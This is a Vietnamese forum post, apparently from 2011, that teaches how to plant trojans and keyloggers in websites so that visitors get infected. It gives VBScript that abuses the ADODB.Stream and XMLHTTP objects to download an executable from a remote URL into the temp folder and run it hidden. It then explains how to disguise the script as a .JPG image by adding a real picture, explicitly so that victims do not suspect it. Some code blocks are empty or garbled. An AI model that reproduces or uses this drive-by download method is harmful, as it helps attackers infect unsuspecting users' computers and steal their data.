Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
Code:

vào trên cùng
Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth)
bằng
Code:
Set Shell1 =
CreateObject(”WScript.Shell”) Shell1.Run(pth)




Sau đó save lại thành file trojan.hta Sau đó
mở file web của bạn cho Victim truy cập ra thêm code này vào để run
file trojan.hta
Code:
datasrc=”#oRun” datafld=”view” dataformatas=”html”>
]]>


để tên File có dạng File ảnh (JPG , GIF ,BMP …) :
Theo cách 2 , mở Notepad :
Code:

on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0

Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý .
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert
Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload
File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .

Tài Sản của Admin Suri Ken
Chữ kí của Admin Suri Ken

Wed Jun 15, 2011 9:13 am
Gắn trojan, keylog, virus vào website, forum Bgavat18
Gắn trojan, keylog, virus vào website, forum Bgavat10Gắn trojan, keylog, virus vào website, forum Bgavat12Gắn trojan, keylog, virus vào website, forum Bgavat13
Gắn trojan, keylog, virus vào website, forum Bgavat15Admin Suri KenGắn trojan, keylog, virus vào website, forum Bgavat17
Gắn trojan, keylog, virus vào website, forum Bgavat19Gắn trojan, keylog, virus vào website, forum Bgavat21Gắn trojan, keylog, virus vào website, forum Bgavat22
MaiKhongQuen - Admin Suri Ken – [Admin]
Tổng số bài gửi : 99
Points : 279
Reputation : 0
Join date : 12/05/2011
Age : 31
Profile Admin Suri Ken
Tổng số bài gửi : 99
Points : 279
Reputation : 0
Join date : 12/05/2011
Age : 31

Gắn trojan, keylog, virus vào website, forum Vide10

Bài gửiTiêu đề: Re: Gắn trojan, keylog, virus vào website, forum
http://thanhsinhtrungtin.forum-viet.com

Tiêu đề: Gắn trojan, keylog, virus vào website, forum

[You must be registered and logged in to see this link.]

Tài Sản của Admin Suri Ken
Chữ kí của Admin Suri Ken


Gắn trojan, keylog, virus vào website, forum

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang
Trang 1 trong tổng số 1 trang
* Không dùng những ngôn từ thiếu lịch sự.
* Bài viết sưu tầm nên ghi rõ nguồn.
* Tránh spam nhảm không liên quan đến chủ đề.

Yêu cầu viết tiếng Việt có dấu.


Permissions in this forum:Bạn không có quyền trả lời bài viết
DIỄN ĐÀN GIAO LƯU CỦA TUỔI TRẺ GIA ĐÌNH ĐẠO CHÚNG TRUNG TÍN TỈNH BÀ RỊA VŨNG TÀU :: NHỊP CẦU GIAO LƯU GIỮA BẬC TIỀN BỐI VÀ CÁC THẾ HỆ ĐÀN EM! :: KHOA HỌC KĨ THUẬT THÔNG TIN CÔNG NGHỆ :: THỦ THUẬT WEB-
Đầu trang
Giữa trang
Cuối trang